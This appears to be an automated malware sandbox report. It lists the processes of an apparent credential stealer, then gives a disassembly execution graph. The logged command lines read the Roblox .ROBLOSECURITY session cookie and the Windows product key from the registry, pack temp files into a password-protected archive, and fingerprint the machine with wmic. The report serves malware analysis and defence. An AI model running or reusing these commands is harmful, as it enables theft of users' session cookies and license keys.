                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:78
                                                                                                                                                                    Start time:09:24:19
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\tree.com
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:tree /A /F
                                                                                                                                                                    Imagebase:0x7ff66f690000
                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                    MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:79
                                                                                                                                                                    Start time:09:24:21
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:80
                                                                                                                                                                    Start time:09:24:21
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:81
                                                                                                                                                                    Start time:09:24:21
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:82
                                                                                                                                                                    Start time:09:24:22
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:83
                                                                                                                                                                    Start time:09:24:22
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:84
                                                                                                                                                                    Start time:09:24:22
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:87
                                                                                                                                                                    Start time:09:24:26
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe a -r -hp"netomahserkral" "C:\Users\user\AppData\Local\Temp\XiW2X.zip" *"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:88
                                                                                                                                                                    Start time:09:24:26
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:89
                                                                                                                                                                    Start time:09:24:26
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe a -r -hp"netomahserkral" "C:\Users\user\AppData\Local\Temp\XiW2X.zip" *
                                                                                                                                                                    Imagebase:0x7ff7d79c0000
                                                                                                                                                                    File size:630'736 bytes
                                                                                                                                                                    MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:90
                                                                                                                                                                    Start time:09:24:27
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:91
                                                                                                                                                                    Start time:09:24:27
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:92
                                                                                                                                                                    Start time:09:24:28
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic os get Caption
                                                                                                                                                                    Imagebase:0x7ff7cbec0000
                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:93
                                                                                                                                                                    Start time:09:24:29
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:94
                                                                                                                                                                    Start time:09:24:29
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:95
                                                                                                                                                                    Start time:09:24:29
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                    Imagebase:0x7ff7cbec0000
                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:96
                                                                                                                                                                    Start time:09:24:30
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:97
                                                                                                                                                                    Start time:09:24:30
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:98
                                                                                                                                                                    Start time:09:24:30
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic csproduct get uuid
                                                                                                                                                                    Imagebase:0x7ff7cbec0000
                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:99
                                                                                                                                                                    Start time:09:24:31
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:100
                                                                                                                                                                    Start time:09:24:31
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:101
                                                                                                                                                                    Start time:09:24:31
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:102
                                                                                                                                                                    Start time:09:24:32
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:103
                                                                                                                                                                    Start time:09:24:32
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:104
                                                                                                                                                                    Start time:09:24:32
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                    Imagebase:0x7ff7cbec0000
                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:105
                                                                                                                                                                    Start time:09:24:33
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:106
                                                                                                                                                                    Start time:09:24:33
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:107
                                                                                                                                                                    Start time:09:24:33
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Disassembly

                                                                                                                                                                    Reset < >

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:12%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:20.9%
                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                      Total number of Limit Nodes:71
                                                                                                                                                                      execution_graph 15414 7ff6313e7cfc 15415 7ff6313e7d63 15414->15415 15416 7ff6313e7d2a 15414->15416 15415->15416 15418 7ff6313e7d68 FindFirstFileExW 15415->15418 15417 7ff6313e52d4 _get_daylight 11 API calls 15416->15417 15419 7ff6313e7d2f 15417->15419 15420 7ff6313e7dd1 15418->15420 15421 7ff6313e7d8a GetLastError 15418->15421 15422 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 15419->15422 15474 7ff6313e7f6c 15420->15474 15424 7ff6313e7d95 15421->15424 15425 7ff6313e7dc1 15421->15425 15426 7ff6313e7d3a 15422->15426 15424->15425 15430 7ff6313e7d9f 15424->15430 15431 7ff6313e7db1 15424->15431 15427 7ff6313e52d4 _get_daylight 11 API calls 15425->15427 15434 7ff6313dbc70 _wfindfirst32i64 8 API calls 15426->15434 15427->15426 15429 7ff6313e7f6c _wfindfirst32i64 10 API calls 15435 7ff6313e7df7 15429->15435 15430->15425 15432 7ff6313e7da4 15430->15432 15433 7ff6313e52d4 _get_daylight 11 API calls 15431->15433 15436 7ff6313e52d4 _get_daylight 11 API calls 15432->15436 15433->15426 15437 7ff6313e7d4e 15434->15437 15438 7ff6313e7f6c _wfindfirst32i64 10 API calls 15435->15438 15436->15426 15439 7ff6313e7e05 15438->15439 15481 7ff6313f0d04 15439->15481 15442 7ff6313e7e2f 15443 7ff6313ead74 _wfindfirst32i64 17 API calls 15442->15443 15444 7ff6313e7e43 15443->15444 15445 7ff6313e7e6d 15444->15445 15447 7ff6313e7eac FindNextFileW 15444->15447 15446 7ff6313e52d4 _get_daylight 11 API calls 15445->15446 15448 7ff6313e7e72 15446->15448 15449 7ff6313e7ebb GetLastError 15447->15449 15450 7ff6313e7efc 15447->15450 15451 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 15448->15451 15452 7ff6313e7eef 15449->15452 15453 7ff6313e7ec6 15449->15453 15454 7ff6313e7f6c _wfindfirst32i64 10 API calls 15450->15454 15461 7ff6313e7e7d 15451->15461 15456 7ff6313e52d4 _get_daylight 11 API calls 15452->15456 15453->15452 15458 7ff6313e7ee2 15453->15458 15459 7ff6313e7ed0 15453->15459 15455 7ff6313e7f14 15454->15455 15457 7ff6313e7f6c _wfindfirst32i64 10 API calls 15455->15457 15456->15461 15462 7ff6313e7f22 15457->15462 15464 7ff6313e52d4 _get_daylight 11 API calls 15458->15464 15459->15452 15463 7ff6313e7ed5 15459->15463 15460 7ff6313dbc70 _wfindfirst32i64 8 API calls 15465 7ff6313e7e90 15460->15465 15461->15460 15466 7ff6313e7f6c _wfindfirst32i64 10 API calls 15462->15466 15467 7ff6313e52d4 _get_daylight 11 API calls 15463->15467 15464->15461 15468 7ff6313e7f30 15466->15468 15467->15461 15469 7ff6313f0d04 _wfindfirst32i64 37 API calls 15468->15469 15470 7ff6313e7f4e 15469->15470 15470->15461 15471 7ff6313e7f56 15470->15471 15472 7ff6313ead74 _wfindfirst32i64 17 API calls 15471->15472 15473 7ff6313e7f6a 15472->15473 15475 7ff6313e7f84 15474->15475 15476 7ff6313e7f8a FileTimeToSystemTime 15474->15476 15475->15476 15478 7ff6313e7faf 15475->15478 15477 7ff6313e7f99 SystemTimeToTzSpecificLocalTime 15476->15477 15476->15478 15477->15478 15479 7ff6313dbc70 _wfindfirst32i64 8 API calls 15478->15479 15480 7ff6313e7de9 15479->15480 15480->15429 15482 7ff6313f0d11 15481->15482 15483 7ff6313f0d1b 15481->15483 15482->15483 15488 7ff6313f0d37 15482->15488 15484 7ff6313e52d4 _get_daylight 11 API calls 15483->15484 15485 7ff6313f0d23 15484->15485 15486 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 15485->15486 15487 7ff6313e7e23 15486->15487 15487->15426 15487->15442 15488->15487 15489 7ff6313e52d4 _get_daylight 11 API calls 15488->15489 15489->15485 19110 7ff6313ea190 19113 7ff6313ea10c 19110->19113 19120 7ff6313f0b68 EnterCriticalSection 19113->19120 19121 7ff6313ec990 19132 7ff6313f0b68 EnterCriticalSection 19121->19132 19143 7ff6313fa9a4 19146 7ff6313e5188 LeaveCriticalSection 19143->19146 15133 7ff6313e9da1 15145 7ff6313ea818 15133->15145 15150 7ff6313eb5c0 GetLastError 15145->15150 15151 7ff6313eb5e4 FlsGetValue 15150->15151 15152 7ff6313eb601 FlsSetValue 15150->15152 15153 7ff6313eb5fb 15151->15153 15169 7ff6313eb5f1 SetLastError 15151->15169 15154 7ff6313eb613 15152->15154 15152->15169 15153->15152 15181 7ff6313ef008 15154->15181 15157 7ff6313eb68d 15160 7ff6313ea94c __FrameHandler3::FrameUnwindToEmptyState 38 API calls 15157->15160 15158 7ff6313ea821 15172 7ff6313ea94c 15158->15172 15163 7ff6313eb692 15160->15163 15161 7ff6313eb640 FlsSetValue 15165 7ff6313eb65e 15161->15165 15166 7ff6313eb64c FlsSetValue 15161->15166 15162 7ff6313eb630 FlsSetValue 15164 7ff6313eb639 15162->15164 15188 7ff6313eadbc 15164->15188 15194 7ff6313eb368 15165->15194 15166->15164 15169->15157 15169->15158 15242 7ff6313f3b70 15172->15242 15187 7ff6313ef019 _get_daylight 15181->15187 15182 7ff6313ef06a 15202 7ff6313e52d4 15182->15202 15183 7ff6313ef04e RtlAllocateHeap 15185 7ff6313eb622 15183->15185 15183->15187 15185->15161 15185->15162 15187->15182 15187->15183 15199 7ff6313f3ab0 15187->15199 15189 7ff6313eadc1 RtlDeleteBoundaryDescriptor 15188->15189 15193 7ff6313eadf0 15188->15193 15190 7ff6313eaddc GetLastError 15189->15190 15189->15193 15191 7ff6313eade9 __free_lconv_mon 15190->15191 15192 7ff6313e52d4 _get_daylight 9 API calls 15191->15192 15192->15193 15193->15169 15228 7ff6313eb240 15194->15228 15205 7ff6313f3af0 15199->15205 15211 7ff6313eb738 GetLastError 15202->15211 15204 7ff6313e52dd 15204->15185 15210 7ff6313f0b68 EnterCriticalSection 15205->15210 15212 7ff6313eb779 FlsSetValue 15211->15212 15215 7ff6313eb75c 15211->15215 15213 7ff6313eb78b 15212->15213 15214 7ff6313eb769 15212->15214 15217 7ff6313ef008 _get_daylight 5 API calls 15213->15217 15216 7ff6313eb7e5 SetLastError 15214->15216 15215->15212 15215->15214 15216->15204 15218 7ff6313eb79a 15217->15218 15219 7ff6313eb7b8 FlsSetValue 15218->15219 15220 7ff6313eb7a8 FlsSetValue 15218->15220 15222 7ff6313eb7c4 FlsSetValue 15219->15222 15223 7ff6313eb7d6 15219->15223 15221 7ff6313eb7b1 15220->15221 15224 7ff6313eadbc __free_lconv_mon 5 API calls 15221->15224 15222->15221 15225 7ff6313eb368 _get_daylight 5 API calls 15223->15225 15224->15214 15226 7ff6313eb7de 15225->15226 15227 7ff6313eadbc __free_lconv_mon 5 API calls 15226->15227 15227->15216 15240 7ff6313f0b68 EnterCriticalSection 15228->15240 15276 7ff6313f3b28 15242->15276 15281 7ff6313f0b68 EnterCriticalSection 15276->15281 15343 7ff6313db4a0 15344 7ff6313db4c3 15343->15344 15345 7ff6313db4df memcpy_s 15343->15345 15347 7ff6313eda6c 15344->15347 15348 7ff6313edab7 15347->15348 15352 7ff6313eda7b _get_daylight 15347->15352 15349 7ff6313e52d4 _get_daylight 11 API calls 15348->15349 15351 7ff6313edab5 15349->15351 15350 7ff6313eda9e RtlAllocateHeap 15350->15351 15350->15352 15351->15345 15352->15348 15352->15350 15353 7ff6313f3ab0 _get_daylight 2 API calls 15352->15353 15353->15352 19457 7ff6313e5120 19458 7ff6313e512b 19457->19458 19466 7ff6313ef614 19458->19466 19479 7ff6313f0b68 EnterCriticalSection 19466->19479 19480 7ff6313fa81e 19481 7ff6313fa82e 19480->19481 19484 7ff6313e5188 LeaveCriticalSection 19481->19484 15359 7ff6313efb9c 15360 7ff6313efd8e 15359->15360 15362 7ff6313efbde _isindst 15359->15362 15361 7ff6313e52d4 _get_daylight 11 API calls 15360->15361 15379 7ff6313efd7e 15361->15379 15362->15360 15365 7ff6313efc5e _isindst 15362->15365 15363 7ff6313dbc70 _wfindfirst32i64 8 API calls 15364 7ff6313efda9 15363->15364 15380 7ff6313f67b4 15365->15380 15370 7ff6313efdba 15372 7ff6313ead74 _wfindfirst32i64 17 API calls 15370->15372 15374 7ff6313efdce 15372->15374 15377 7ff6313efcbb 15377->15379 15405 7ff6313f67f8 15377->15405 15379->15363 15381 7ff6313f67c3 15380->15381 15382 7ff6313efc7c 15380->15382 15412 7ff6313f0b68 EnterCriticalSection 15381->15412 15387 7ff6313f5bb8 